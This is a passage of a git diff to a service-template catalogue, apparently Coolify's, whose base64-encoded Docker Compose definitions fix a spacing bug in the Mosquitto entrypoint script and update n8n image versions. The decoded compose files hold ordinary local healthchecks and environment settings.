iAgICB2b2x1bWVzOgogICAgICAtICdnaG9zdC1teXNxbC1kYXRhOi92YXIvbGliL215c3FsJwogICAgZW52aXJvbm1lbnQ6CiAgICAgIC0gJ01ZU1FMX1VTRVI9JHtTRVJWSUNFX1VTRVJfTVlTUUx9JwogICAgICAtICdNWVNRTF9QQVNTV09SRD0ke1NFUlZJQ0VfUEFTU1dPUkRfTVlTUUx9JwogICAgICAtICdNWVNRTF9EQVRBQkFTRT0ke01ZU1FMX0RBVEFCQVNFfScKICAgICAgLSAnTVlTUUxfUk9PVF9QQVNTV09SRD0ke1NFUlZJQ0VfUEFTU1dPUkRfTVlTUUxST09UfScKICAgIGhlYWx0aGNoZWNrOgogICAgICB0ZXN0OgogICAgICAgIC0gQ01ECiAgICAgICAgLSBteXNxbGFkbWluCiAgICAgICAgLSBwaW5nCiAgICAgICAgLSAnLWgnCiAgICAgICAgLSAxMjcuMC4wLjEKICAgICAgaW50ZXJ2YWw6IDVzCiAgICAgIHRpbWVvdXQ6IDIwcwogICAgICByZXRyaWVzOiAxMAo=", "tags": [ "cms", "blog", @@ -2589,7 +2589,7 @@ "mosquitto": { "documentation": "https://mosquitto.org/documentation/?utm_source=coolify.io", "slogan": "Mosquitto is lightweight and suitable for use on all devices, from low-power single-board computers to full servers.", - "compose": "c2VydmljZXM6CiAgbW9zcXVpdHRvOgogICAgaW1hZ2U6IGVjbGlwc2UtbW9zcXVpdHRvCiAgICBlbnZpcm9ubWVudDoKICAgICAgLSBTRVJWSUNFX0ZRRE5fTU9TUVVJVFRPXzE4ODMKICAgICAgLSAnTVFUVF9VU0VSTkFNRT0ke1NFUlZJQ0VfVVNFUl9NT1NRVUlUVE99JwogICAgICAtICdNUVRUX1BBU1NXT1JEPSR7U0VSVklDRV9QQVNTV09SRF9NT1NRVUlUVE99JwogICAgICAtICdSRVFVSVJFX0NFUlRJRklDQVRFPSR7UkVRVUlSRV9DRVJUSUZJQ0FURTotZmFsc2V9JwogICAgICAtICdBTExPV19BTk9OWU1PVVM9JHtBTExPV19BTk9OWU1PVVM6LXRydWV9JwogICAgdm9sdW1lczoKICAgICAgLSAnbW9zcXVpdHRvLWNvbmZpZzovbW9zcXVpdHRvL2NvbmZpZycKICAgICAgLSAnbW9zcXVpdHRvLWNlcnRzOi9jZXJ0cycKICAgIGhlYWx0aGNoZWNrOgogICAgICB0ZXN0OgogICAgICAgIC0gQ01ELVNIRUxMCiAgICAgICAgLSAnZXhpdCAwJwogICAgICBpbnRlcnZhbDogMzBzCiAgICAgIHRpbWVvdXQ6IDEwcwogICAgICByZXRyaWVzOiAzCiAgICBlbnRyeXBvaW50OiAic2ggLWMgXCIgaWYgWyAnJFJFUVVJUkVfQ0VSVElGSUNBVEUnID0gJ3RydWUnIF07IHRoZW4gZWNobyAnbGlzdGVuZXIgODg4MycgPiAvbW9zcXVpdHRvL2NvbmZpZy9tb3NxdWl0dG8uY29uZiAmJiBlY2hvICdjYWZpbGUgL2NlcnRzL2NhLmNydCcgPj4gL21vc3F1aXR0by9jb25maWcvbW9zcXVpdHRvLmNvbmYgJiYgZWNobyAnY2VydGZpbGUgL2NlcnRzL3NlcnZlci5jcnQnID4+IC9tb3NxdWl0dG8vY29uZmlnL21vc3F1aXR0by5jb25mICYmIGVjaG8gJ2tleWZpbGUgIC9jZXJ0cy9zZXJ2ZXIua2V5JyA+PiAvbW9zcXVpdHRvL2NvbmZpZy9tb3NxdWl0dG8uY29uZjsgZWxzZSBlY2hvICdsaXN0ZW5lciAxODgzJyA+IC9tb3NxdWl0dG8vY29uZmlnL21vc3F1aXR0by5jb25mOyBmaSAmJiBlY2hvICdyZXF1aXJlX2NlcnRpZmljYXRlICckUkVRVUlSRV9DRVJUSUZJQ0FURSA+PiAvbW9zcXVpdHRvL2NvbmZpZy9tb3NxdWl0dG8uY29uZiAmJiBlY2hvICdhbGxvd19hbm9ueW1vdXMgJyRBTExPV19BTk9OWU1PVVMgPj4gL21vc3F1aXR0by9jb25maWcvbW9zcXVpdHRvLmNvbmY7IGlmIFsgLW4gJyRTRVJWSUNFX1VTRVJfTU9TUVVJVFRPJ10gJiYgWyAtbiAnJFNFUlZJQ0VfUEFTU1dPUkRfTU9TUVVJVFRPJyBdOyB0aGVuIGVjaG8gJ3Bhc3N3b3JkX2ZpbGUgL21vc3F1aXR0by9jb25maWcvcGFzc3dvcmRzJyA+PiAvbW9zcXVpdHRvL2NvbmZpZy9tb3NxdWl0dG8uY29uZiAmJiB0b3VjaCAvbW9zcXVpdHRvL2NvbmZpZy9wYXNzd29yZHMgJiYgY2htb2QgMDcwMCAvbW9zcXVpdHRvL2NvbmZpZy9wYXNzd29yZHMgJiYgY2hvd24gcm9vdDpyb290IC9tb3NxdWl0dG8vY29uZmlnL3Bhc3N3b3JkcyAmJiBtb3NxdWl0dG9fcGFzc3dkIC1iIC1jIC9tb3NxdWl0dG8vY29uZmlnL3Bhc3N3b3JkcyAkU0VSVklDRV9VU0VSX01PU1FVSVRUTyAkU0VSVklDRV9QQVNTV09SRF9NT1NRVUlUVE8gJiYgY2hvd24gbW9zcXVpdHRvOm1vc3F1aXR0byAvbW9zcXVpdHRvL2NvbmZpZy9wYXNzd29yZHM7IGZpICYmIGV4ZWMgbW9zcXVpdHRvIC1jIC9tb3NxdWl0dG8vY29uZmlnL21vc3F1aXR0by5jb25mIFwiIgogICAgbGFiZWxzOgogICAgICAtIHRyYWVmaWsudGNwLnJvdXRlcnMubXF0dC5lbnRyeXBvaW50cz1tcXR0CiAgICAgIC0gdHJhZWZpay50Y3Aucm91dGVycy5tcXR0cy5lbnRyeXBvaW50cz1tcXR0cwo=", + "compose": "c2VydmljZXM6CiAgbW9zcXVpdHRvOgogICAgaW1hZ2U6IGVjbGlwc2UtbW9zcXVpdHRvCiAgICBlbnZpcm9ubWVudDoKICAgICAgLSBTRVJWSUNFX0ZRRE5fTU9TUVVJVFRPXzE4ODMKICAgICAgLSAnTVFUVF9VU0VSTkFNRT0ke1NFUlZJQ0VfVVNFUl9NT1NRVUlUVE99JwogICAgICAtICdNUVRUX1BBU1NXT1JEPSR7U0VSVklDRV9QQVNTV09SRF9NT1NRVUlUVE99JwogICAgICAtICdSRVFVSVJFX0NFUlRJRklDQVRFPSR7UkVRVUlSRV9DRVJUSUZJQ0FURTotZmFsc2V9JwogICAgICAtICdBTExPV19BTk9OWU1PVVM9JHtBTExPV19BTk9OWU1PVVM6LXRydWV9JwogICAgdm9sdW1lczoKICAgICAgLSAnbW9zcXVpdHRvLWNvbmZpZzovbW9zcXVpdHRvL2NvbmZpZycKICAgICAgLSAnbW9zcXVpdHRvLWNlcnRzOi9jZXJ0cycKICAgIGhlYWx0aGNoZWNrOgogICAgICB0ZXN0OgogICAgICAgIC0gQ01ELVNIRUxMCiAgICAgICAgLSAnZXhpdCAwJwogICAgICBpbnRlcnZhbDogMzBzCiAgICAgIHRpbWVvdXQ6IDEwcwogICAgICByZXRyaWVzOiAzCiAgICBlbnRyeXBvaW50OiAic2ggLWMgXCIgaWYgWyAnJFJFUVVJUkVfQ0VSVElGSUNBVEUnID0gJ3RydWUnIF07IHRoZW4gZWNobyAnbGlzdGVuZXIgODg4MycgPiAvbW9zcXVpdHRvL2NvbmZpZy9tb3NxdWl0dG8uY29uZiAmJiBlY2hvICdjYWZpbGUgL2NlcnRzL2NhLmNydCcgPj4gL21vc3F1aXR0by9jb25maWcvbW9zcXVpdHRvLmNvbmYgJiYgZWNobyAnY2VydGZpbGUgL2NlcnRzL3NlcnZlci5jcnQnID4+IC9tb3NxdWl0dG8vY29uZmlnL21vc3F1aXR0by5jb25mICYmIGVjaG8gJ2tleWZpbGUgIC9jZXJ0cy9zZXJ2ZXIua2V5JyA+PiAvbW9zcXVpdHRvL2NvbmZpZy9tb3NxdWl0dG8uY29uZjsgZWxzZSBlY2hvICdsaXN0ZW5lciAxODgzJyA+IC9tb3NxdWl0dG8vY29uZmlnL21vc3F1aXR0by5jb25mOyBmaSAmJiBlY2hvICdyZXF1aXJlX2NlcnRpZmljYXRlICckUkVRVUlSRV9DRVJUSUZJQ0FURSA+PiAvbW9zcXVpdHRvL2NvbmZpZy9tb3NxdWl0dG8uY29uZiAmJiBlY2hvICdhbGxvd19hbm9ueW1vdXMgJyRBTExPV19BTk9OWU1PVVMgPj4gL21vc3F1aXR0by9jb25maWcvbW9zcXVpdHRvLmNvbmY7IGlmIFsgLW4gJyRTRVJWSUNFX1VTRVJfTU9TUVVJVFRPJyBdICYmIFsgLW4gJyRTRVJWSUNFX1BBU1NXT1JEX01PU1FVSVRUTycgXTsgdGhlbiBlY2hvICdwYXNzd29yZF9maWxlIC9tb3NxdWl0dG8vY29uZmlnL3Bhc3N3b3JkcycgPj4gL21vc3F1aXR0by9jb25maWcvbW9zcXVpdHRvLmNvbmYgJiYgdG91Y2ggL21vc3F1aXR0by9jb25maWcvcGFzc3dvcmRzICYmIGNobW9kIDA3MDAgL21vc3F1aXR0by9jb25maWcvcGFzc3dvcmRzICYmIGNob3duIHJvb3Q6cm9vdCAvbW9zcXVpdHRvL2NvbmZpZy9wYXNzd29yZHMgJiYgbW9zcXVpdHRvX3Bhc3N3ZCAtYiAtYyAvbW9zcXVpdHRvL2NvbmZpZy9wYXNzd29yZHMgJFNFUlZJQ0VfVVNFUl9NT1NRVUlUVE8gJFNFUlZJQ0VfUEFTU1dPUkRfTU9TUVVJVFRPICYmIGNob3duIG1vc3F1aXR0bzptb3NxdWl0dG8gL21vc3F1aXR0by9jb25maWcvcGFzc3dvcmRzOyBmaSAmJiBleGVjIG1vc3F1aXR0byAtYyAvbW9zcXVpdHRvL2NvbmZpZy9tb3NxdWl0dG8uY29uZiBcIiIKICAgIGxhYmVsczoKICAgICAgLSB0cmFlZmlrLnRjcC5yb3V0ZXJzLm1xdHQuZW50cnlwb2ludHM9bXF0dAogICAgICAtIHRyYWVmaWsudGNwLnJvdXRlcnMubXF0dHMuZW50cnlwb2ludHM9bXF0dHMK", "tags": [ "mosquitto", "mqtt", @@ -2603,7 +2603,7 @@ "n8n-with-postgres-and-worker": { "documentation": "https://n8n.io?utm_source=coolify.io", "slogan": "n8n is an extendable workflow automation tool with queue mode and workers.", - "compose": "c2VydmljZXM6CiAgbjhuOgogICAgaW1hZ2U6ICdkb2NrZXIubjhuLmlvL244bmlvL244bjoxLjExNC40JwogICAgZW52aXJvbm1lbnQ6CiAgICAgIC0gU0VSVklDRV9GUUROX044Tl81Njc4CiAgICAgIC0gJ044Tl9FRElUT1JfQkFTRV9VUkw9JHtTRVJWSUNFX0ZRRE5fTjhOfScKICAgICAgLSAnV0VCSE9PS19VUkw9JHtTRVJWSUNFX0ZRRE5fTjhOfScKICAgICAgLSAnTjhOX0hPU1Q9JHtTRVJWSUNFX0ZRRE5fTjhOfScKICAgICAgLSAnR0VORVJJQ19USU1FWk9ORT0ke0dFTkVSSUNfVElNRVpPTkU6LUV1cm9wZS9CZXJsaW59JwogICAgICAtICdUWj0ke1RaOi1FdXJvcGUvQmVybGlufScKICAgICAgLSBEQl9UWVBFPXBvc3RncmVzZGIKICAgICAgLSAnREJfUE9TVEdSRVNEQl9EQVRBQkFTRT0ke1BPU1RHUkVTX0RCOi1uOG59JwogICAgICAtIERCX1BPU1RHUkVTREJfSE9TVD1wb3N0Z3Jlc3FsCiAgICAgIC0gREJfUE9TVEdSRVNEQl9QT1JUPTU0MzIKICAgICAgLSBEQl9QT1NUR1JFU0RCX1VTRVI9JFNFUlZJQ0VfVVNFUl9QT1NUR1JFUwogICAgICAtIERCX1BPU1RHUkVTREJfU0NIRU1BPXB1YmxpYwogICAgICAtIERCX1BPU1RHUkVTREJfUEFTU1dPUkQ9JFNFUlZJQ0VfUEFTU1dPUkRfUE9TVEdSRVMKICAgICAgLSBFWEVDVVRJT05TX01PREU9cXVldWUKICAgICAgLSBRVUVVRV9CVUxMX1JFRElTX0hPU1Q9cmVkaXMKICAgICAgLSBRVUVVRV9IRUFMVEhfQ0hFQ0tfQUNUSVZFPXRydWUKICAgICAgLSAnTjhOX0VOQ1JZUFRJT05fS0VZPSR7U0VSVklDRV9QQVNTV09SRF9FTkNSWVBUSU9OfScKICAgICAgLSBOOE5fUlVOTkVSU19FTkFCTEVEPXRydWUKICAgICAgLSBPRkZMT0FEX01BTlVBTF9FWEVDVVRJT05TX1RPX1dPUktFUlM9dHJ1ZQogICAgICAtICdOOE5fQkxPQ0tfRU5WX0FDQ0VTU19JTl9OT0RFPSR7TjhOX0JMT0NLX0VOVl9BQ0NFU1NfSU5fTk9ERTotdHJ1ZX0nCiAgICAgIC0gJ044Tl9HSVRfTk9ERV9ESVNBQkxFX0JBUkVfUkVQT1M9JHtOOE5fR0lUX05PREVfRElTQUJMRV9CQVJFX1JFUE9TOi10cnVlfScKICAgICAgLSAnTjhOX0VORk9SQ0VfU0VUVElOR1NfRklMRV9QRVJNSVNTSU9OUz0ke044Tl9FTkZPUkNFX1NFVFRJTkdTX0ZJTEVfUEVSTUlTU0lPTlM6LXRydWV9JwogICAgICAtICdOOE5fUFJPWFlfSE9QUz0ke044Tl9QUk9YWV9IT1BTOi0xfScKICAgIHZvbHVtZXM6CiAgICAgIC0gJ244bi1kYXRhOi9ob21lL25vZGUvLm44bicKICAgIGRlcGVuZHNfb246CiAgICAgIHBvc3RncmVzcWw6CiAgICAgICAgY29uZGl0aW9uOiBzZXJ2aWNlX2hlYWx0aHkKICAgICAgcmVkaXM6CiAgICAgICAgY29uZGl0aW9uOiBzZXJ2aWNlX2hlYWx0aHkKICAgIGhlYWx0aGNoZWNrOgogICAgICB0ZXN0OgogICAgICAgIC0gQ01ELVNIRUxMCiAgICAgICAgLSAnd2dldCAtcU8tIGh0dHA6Ly8xMjcuMC4wLjE6NTY3OC8nCiAgICAgIGludGVydmFsOiA1cwogICAgICB0aW1lb3V0OiAyMHMKICAgICAgcmV0cmllczogMTAKICBuOG4td29ya2VyOgogICAgaW1hZ2U6ICdkb2NrZXIubjhuLmlvL244bmlvL244bjoxLjExNC40JwogICAgY29tbWFuZDogd29ya2VyCiAgICBlbnZpcm9ubWVudDoKICAgICAgLSAnR0VORVJJQ19USU1FWk9ORT0ke0dFTkVSSUNfVElNRVpPTkU6LUV1cm9wZS9CZXJsaW59JwogICAgICAtICdUWj0ke1RaOi1FdXJvcGUvQmVybGlufScKICAgICAgLSBEQl9UWVBFPXBvc3RncmVzZGIKICAgICAgLSAnREJfUE9TVEdSRVNEQl9EQVRBQkFTRT0ke1BPU1RHUkVTX0RCOi1uOG59JwogICAgICAtIERCX1BPU1RHUkVTREJfSE9TVD1wb3N0Z3Jlc3FsCiAgICAgIC0gREJfUE9TVEdSRVNEQl9QT1JUPTU0MzIKICAgICAgLSBEQl9QT1NUR1JFU0RCX1VTRVI9JFNFUlZJQ0VfVVNFUl9QT1NUR1JFUwogICAgICAtIERCX1BPU1RHUkVTREJfU0NIRU1BPXB1YmxpYwogICAgICAtIERCX1BPU1RHUkVTREJfUEFTU1dPUkQ9JFNFUlZJQ0VfUEFTU1dPUkRfUE9TVEdSRVMKICAgICAgLSBFWEVDVVRJT05TX01PREU9cXVldWUKICAgICAgLSBRVUVVRV9CVUxMX1JFRElTX0hPU1Q9cmVkaXMKICAgICAgLSBRVUVVRV9IRUFMVEhfQ0hFQ0tfQUNUSVZFPXRydWUKICAgICAgLSAnTjhOX0VOQ1JZUFRJT05fS0VZPSR7U0VSVklDRV9QQVNTV09SRF9FTkNSWVBUSU9OfScKICAgICAgLSBOOE5fUlVOTkVSU19FTkFCTEVEPXRydWUKICAgICAgLSAnTjhOX0JMT0NLX0VOVl9BQ0NFU1NfSU5fTk9ERT0ke044Tl9CTE9DS19FTlZfQUNDRVNTX0lOX05PREU6LXRydWV9JwogICAgICAtICdOOE5fR0lUX05PREVfRElTQUJMRV9CQVJFX1JFUE9TPSR7TjhOX0dJVF9OT0RFX0RJU0FCTEVfQkFSRV9SRVBPUzotdHJ1ZX0nCiAgICAgIC0gJ044Tl9FTkZPUkNFX1NFVFRJTkdTX0ZJTEVfUEVSTUlTU0lPTlM9JHtOOE5fRU5GT1JDRV9TRVRUSU5HU19GSUxFX1BFUk1JU1NJT05TOi10cnVlfScKICAgICAgLSAnTjhOX1BST1hZX0hPUFM9JHtOOE5fUFJPWFlfSE9QUzotMX0nCiAgICB2b2x1bWVzOgogICAgICAtICduOG4tZGF0YTovaG9tZS9ub2RlLy5uOG4nCiAgICBoZWFsdGhjaGVjazoKICAgICAgdGVzdDoKICAgICAgICAtIENNRC1TSEVMTAogICAgICAgIC0gJ3dnZXQgLXFPLSBodHRwOi8vMTI3LjAuMC4xOjU2NzgvaGVhbHRoeicKICAgICAgaW50ZXJ2YWw6IDVzCiAgICAgIHRpbWVvdXQ6IDIwcwogICAgICByZXRyaWVzOiAxMAogICAgZGVwZW5kc19vbjoKICAgICAgbjhuOgogICAgICAgIGNvbmRpdGlvbjogc2VydmljZV9oZWFsdGh5CiAgICAgIHBvc3RncmVzcWw6CiAgICAgICAgY29uZGl0aW9uOiBzZXJ2aWNlX2hlYWx0aHkKICAgICAgcmVkaXM6CiAgICAgICAgY29uZGl0aW9uOiBzZXJ2aWNlX2hlYWx0aHkKICBwb3N0Z3Jlc3FsOgogICAgaW1hZ2U6ICdwb3N0Z3JlczoxNi1hbHBpbmUnCiAgICB2b2x1bWVzOgogICAgICAtICdwb3N0Z3Jlc3FsLWRhdGE6L3Zhci9saWIvcG9zdGdyZXNxbC9kYXRhJwogICAgZW52aXJvbm1lbnQ6CiAgICAgIC0gUE9TVEdSRVNfVVNFUj0kU0VSVklDRV9VU0VSX1BPU1RHUkVTCiAgICAgIC0gUE9TVEdSRVNfUEFTU1dPUkQ9JFNFUlZJQ0VfUEFTU1dPUkRfUE9TVEdSRVMKICAgICAgLSAnUE9TVEdSRVNfREI9JHtQT1NUR1JFU19EQjotbjhufScKICAgIGhlYWx0aGNoZWNrOgogICAgICB0ZXN0OgogICAgICAgIC0gQ01ELVNIRUxMCiAgICAgICAgLSAncGdfaXNyZWFkeSAtVSAkJHtQT1NUR1JFU19VU0VSfSAtZCAkJHtQT1NUR1JFU19EQn0nCiAgICAgIGludGVydmFsOiA1cwogICAgICB0aW1lb3V0OiAyMHMKICAgICAgcmV0cmllczogMTAKICByZWRpczoKICAgIGltYWdlOiAncmVkaXM6Ni1hbHBpbmUnCiAgICB2b2x1bWVzOgogICAgICAtICdyZWRpcy1kYXRhOi9kYXRhJwogICAgaGVhbHRoY2hlY2s6CiAgICAgIHRlc3Q6CiAgICAgICAgLSBDTUQKICAgICAgICAtIHJlZGlzLWNsaQogICAgICAgIC0gcGluZwogICAgICBpbnRlcnZhbDogNXMKICAgICAgdGltZW91dDogNXMKICAgICAgcmV0cmllczogMTAK", + "compose": "c2VydmljZXM6CiAgbjhuOgogICAgaW1hZ2U6ICdkb2NrZXIubjhuLmlvL244bmlvL244bjoxLjExOS4yJwogICAgZW52aXJvbm1lbnQ6CiAgICAgIC0gU0VSVklDRV9GUUROX044Tl81Njc4CiAgICAgIC0gJ044Tl9FRElUT1JfQkFTRV9VUkw9JHtTRVJWSUNFX0ZRRE5fTjhOfScKICAgICAgLSAnV0VCSE9PS19VUkw9JHtTRVJWSUNFX0ZRRE5fTjhOfScKICAgICAgLSAnTjhOX0hPU1Q9JHtTRVJWSUNFX0ZRRE5fTjhOfScKICAgICAgLSAnR0VORVJJQ19USU1FWk9ORT0ke0dFTkVSSUNfVElNRVpPTkU6LUV1cm9wZS9CZXJsaW59JwogICAgICAtICdUWj0ke1RaOi1FdXJvcGUvQmVybGlufScKICAgICAgLSBEQl9UWVBFPXBvc3RncmVzZGIKICAgICAgLSAnREJfUE9TVEdSRVNEQl9EQVRBQkFTRT0ke1BPU1RHUkVTX0RCOi1uOG59JwogICAgICAtIERCX1BPU1RHUkVTREJfSE9TVD1wb3N0Z3Jlc3FsCiAgICAgIC0gREJfUE9TVEdSRVNEQl9QT1JUPTU0MzIKICAgICAgLSBEQl9QT1NUR1JFU0RCX1VTRVI9JFNFUlZJQ0VfVVNFUl9QT1NUR1JFUwogICAgICAtIERCX1BPU1RHUkVTREJfU0NIRU1BPXB1YmxpYwogICAgICAtIERCX1BPU1RHUkVTREJfUEFTU1dPUkQ9JFNFUlZJQ0VfUEFTU1dPUkRfUE9TVEdSRVMKICAgICAgLSBFWEVDVVRJT05TX01PREU9cXVldWUKICAgICAgLSBRVUVVRV9CVUxMX1JFRElTX0hPU1Q9cmVkaXMKICAgICAgLSBRVUVVRV9IRUFMVEhfQ0hFQ0tfQUNUSVZFPXRydWUKICAgICAgLSAnTjhOX0VOQ1JZUFRJT05fS0VZPSR7U0VSVklDRV9QQVNTV09SRF9FTkNSWVBUSU9OfScKICAgICAgLSBOOE5fUlVOTkVSU19FTkFCTEVEPXRydWUKICAgICAgLSBPRkZMT0FEX01BTlVBTF9FWEVDVVRJT05TX1RPX1dPUktFUlM9dHJ1ZQogICAgICAtICdOOE5fQkxPQ0tfRU5WX0FDQ0VTU19JTl9OT0RFPSR7TjhOX0JMT0NLX0VOVl9BQ0NFU1NfSU5fTk9ERTotdHJ1ZX0nCiAgICAgIC0gJ044Tl9HSVRfTk9ERV9ESVNBQkxFX0JBUkVfUkVQT1M9JHtOOE5fR0lUX05PREVfRElTQUJMRV9CQVJFX1JFUE9TOi10cnVlfScKICAgICAgLSAnTjhOX0VORk9SQ0VfU0VUVElOR1NfRklMRV9QRVJNSVNTSU9OUz0ke044Tl9FTkZPUkNFX1NFVFRJTkdTX0ZJTEVfUEVSTUlTU0lPTlM6LXRydWV9JwogICAgICAtICdOOE5fUFJPWFlfSE9QUz0ke044Tl9QUk9YWV9IT1BTOi0xfScKICAgIHZvbHVtZXM6CiAgICAgIC0gJ244bi1kYXRhOi9ob21lL25vZGUvLm44bicKICAgIGRlcGVuZHNfb246CiAgICAgIHBvc3RncmVzcWw6CiAgICAgICAgY29uZGl0aW9uOiBzZXJ2aWNlX2hlYWx0aHkKICAgICAgcmVkaXM6CiAgICAgICAgY29uZGl0aW9uOiBzZXJ2aWNlX2hlYWx0aHkKICAgIGhlYWx0aGNoZWNrOgogICAgICB0ZXN0OgogICAgICAgIC0gQ01ELVNIRUxMCiAgICAgICAgLSAnd2dldCAtcU8tIGh0dHA6Ly8xMjcuMC4wLjE6NTY3OC8nCiAgICAgIGludGVydmFsOiA1cwogICAgICB0aW1lb3V0OiAyMHMKICAgICAgcmV0cmllczogMTAKICBuOG4td29ya2VyOgogICAgaW1hZ2U6ICdkb2NrZXIubjhuLmlvL244bmlvL244bjoxLjExOS4yJwogICAgY29tbWFuZDogd29ya2VyCiAgICBlbnZpcm9ubWVudDoKICAgICAgLSAnR0VORVJJQ19USU1FWk9ORT0ke0dFTkVSSUNfVElNRVpPTkU6LUV1cm9wZS9CZXJsaW59JwogICAgICAtICdUWj0ke1RaOi1FdXJvcGUvQmVybGlufScKICAgICAgLSBEQl9UWVBFPXBvc3RncmVzZGIKICAgICAgLSAnREJfUE9TVEdSRVNEQl9EQVRBQkFTRT0ke1BPU1RHUkVTX0RCOi1uOG59JwogICAgICAtIERCX1BPU1RHUkVTREJfSE9TVD1wb3N0Z3Jlc3FsCiAgICAgIC0gREJfUE9TVEdSRVNEQl9QT1JUPTU0MzIKICAgICAgLSBEQl9QT1NUR1JFU0RCX1VTRVI9JFNFUlZJQ0VfVVNFUl9QT1NUR1JFUwogICAgICAtIERCX1BPU1RHUkVTREJfU0NIRU1BPXB1YmxpYwogICAgICAtIERCX1BPU1RHUkVTREJfUEFTU1dPUkQ9JFNFUlZJQ0VfUEFTU1dPUkRfUE9TVEdSRVMKICAgICAgLSBFWEVDVVRJT05TX01PREU9cXVldWUKICAgICAgLSBRVUVVRV9CVUxMX1JFRElTX0hPU1Q9cmVkaXMKICAgICAgLSBRVUVVRV9IRUFMVEhfQ0hFQ0tfQUNUSVZFPXRydWUKICAgICAgLSAnTjhOX0VOQ1JZUFRJT05fS0VZPSR7U0VSVklDRV9QQVNTV09SRF9FTkNSWVBUSU9OfScKICAgICAgLSBOOE5fUlVOTkVSU19FTkFCTEVEPXRydWUKICAgICAgLSAnTjhOX0JMT0NLX0VOVl9BQ0NFU1NfSU5fTk9ERT0ke044Tl9CTE9DS19FTlZfQUNDRVNTX0lOX05PREU6LXRydWV9JwogICAgICAtICdOOE5fR0lUX05PREVfRElTQUJMRV9CQVJFX1JFUE9TPSR7TjhOX0dJVF9OT0RFX0RJU0FCTEVfQkFSRV9SRVBPUzotdHJ1ZX0nCiAgICAgIC0gJ044Tl9FTkZPUkNFX1NFVFRJTkdTX0ZJTEVfUEVSTUlTU0lPTlM9JHtOOE5fRU5GT1JDRV9TRVRUSU5HU19GSUxFX1BFUk1JU1NJT05TOi10cnVlfScKICAgICAgLSAnTjhOX1BST1hZX0hPUFM9JHtOOE5fUFJPWFlfSE9QUzotMX0nCiAgICB2b2x1bWVzOgogICAgICAtICduOG4tZGF0YTovaG9tZS9ub2RlLy5uOG4nCiAgICBoZWFsdGhjaGVjazoKICAgICAgdGVzdDoKICAgICAgICAtIENNRC1TSEVMTAogICAgICAgIC0gJ3dnZXQgLXFPLSBodHRwOi8vMTI3LjAuMC4xOjU2NzgvaGVhbHRoeicKICAgICAgaW50ZXJ2YWw6IDVzCiAgICAgIHRpbWVvdXQ6IDIwcwogICAgICByZXRyaWVzOiAxMAogICAgZGVwZW5kc19vbjoKICAgICAgbjhuOgogICAgICAgIGNvbmRpdGlvbjogc2VydmljZV9oZWFsdGh5CiAgICAgIHBvc3RncmVzcWw6CiAgICAgICAgY29uZGl0aW9uOiBzZXJ2aWNlX2hlYWx0aHkKICAgICAgcmVkaXM6CiAgICAgICAgY29uZGl0aW9uOiBzZXJ2aWNlX2hlYWx0aHkKICBwb3N0Z3Jlc3FsOgogICAgaW1hZ2U6ICdwb3N0Z3JlczoxNi1hbHBpbmUnCiAgICB2b2x1bWVzOgogICAgICAtICdwb3N0Z3Jlc3FsLWRhdGE6L3Zhci9saWIvcG9zdGdyZXNxbC9kYXRhJwogICAgZW52aXJvbm1lbnQ6CiAgICAgIC0gUE9TVEdSRVNfVVNFUj0kU0VSVklDRV9VU0VSX1BPU1RHUkVTCiAgICAgIC0gUE9TVEdSRVNfUEFTU1dPUkQ9JFNFUlZJQ0VfUEFTU1dPUkRfUE9TVEdSRVMKICAgICAgLSAnUE9TVEdSRVNfREI9JHtQT1NUR1JFU19EQjotbjhufScKICAgIGhlYWx0aGNoZWNrOgogICAgICB0ZXN0OgogICAgICAgIC0gQ01ELVNIRUxMCiAgICAgICAgLSAncGdfaXNyZWFkeSAtVSAkJHtQT1NUR1JFU19VU0VSfSAtZCAkJHtQT1NUR1JFU19EQn0nCiAgICAgIGludGVydmFsOiA1cwogICAgICB0aW1lb3V0OiAyMHMKICAgICAgcmV0cmllczogMTAKICByZWRpczoKICAgIGltYWdlOiAncmVkaXM6Ni1hbHBpbmUnCiAgICB2b2x1bWVzOgogICAgICAtICdyZWRpcy1kYXRhOi9kYXRhJwogICAgaGVhbHRoY2hlY2s6CiAgICAgIHRlc3Q6CiAgICAgICAgLSBDTUQKICAgICAgICAtIHJlZGlzLWNsaQogICAgICAgIC0gcGluZwogICAgICBpbnRlcnZhbDogNXMKICAgICAgdGltZW91dDogNXMKICAgICAgcmV0cmllczogMTAK", "tags": [ "n8n", "workflow", @@ -2624,7 +2624,7 @@ "n8n-with-postgresql": { "documentation": "https://n8n.io?utm_source=coolify.io", "slogan": "n8n is an extendable workflow automation tool.", - "compose": "c2VydmljZXM6CiAgbjhuOgogICAgaW1hZ2U6ICdkb2NrZXIubjhuLmlvL244bmlvL244bjoxLjExNC40JwogICAgZW52aXJvbm1lbnQ6CiAgICAgIC0gU0VSVklDRV9GUUROX044Tl81Njc4CiAgICAgIC0gJ044Tl9FRElUT1JfQkFTRV9VUkw9JHtTRVJWSUNFX0ZRRE5fTjhOfScKICAgICAgLSAnV0VCSE9PS19VUkw9JHtTRVJWSUNFX0ZRRE5fTjhOfScKICAgICAgLSAnTjhOX0hPU1Q9JHtTRVJWSUNFX0ZRRE5fTjhOfScKICAgICAgLSAnR0VORVJJQ19USU1FWk9ORT0ke0dFTkVSSUNfVElNRVpPTkU6LUV1cm9wZS9CZXJsaW59JwogICAgICAtICdUWj0ke1RaOi1FdXJvcGUvQmVybGlufScKICAgICAgLSBEQl9UWVBFPXBvc3RncmVzZGIKICAgICAgLSAnREJfUE9TVEdSRVNEQl9EQVRBQkFTRT0ke1BPU1RHUkVTX0RCOi1uOG59JwogICAgICAtIERCX1BPU1RHUkVTREJfSE9TVD1wb3N0Z3Jlc3FsCiAgICAgIC0gREJfUE9TVEdSRVNEQl9QT1JUPTU0MzIKICAgICAgLSBEQl9QT1NUR1JFU0RCX1VTRVI9JFNFUlZJQ0VfVVNFUl9QT1NUR1JFUwogICAgICAtIERCX1BPU1RHUkVTREJfU0NIRU1BPXB1YmxpYwogICAgICAtIERCX1BPU1RHUkVTREJfUEFTU1dPUkQ9JFNFUlZJQ0VfUEFTU1dPUkRfUE9TVEdSRVMKICAgICAgLSAnTjhOX1JVTk5FUlNfRU5BQkxFRD0ke044Tl9SVU5ORVJTX0VOQUJMRUQ6LXRydWV9JwogICAgICAtICdOOE5fQkxPQ0tfRU5WX0FDQ0VTU19JTl9OT0RFPSR7TjhOX0JMT0NLX0VOVl9BQ0NFU1NfSU5fTk9ERTotdHJ1ZX0nCiAgICAgIC0gJ044Tl9HSVRfTk9ERV9ESVNBQkxFX0JBUkVfUkVQT1M9JHtOOE5fR0lUX05PREVfRElTQUJMRV9CQVJFX1JFUE9TOi10cnVlfScKICAgICAgLSAnTjhOX0VORk9SQ0VfU0VUVEl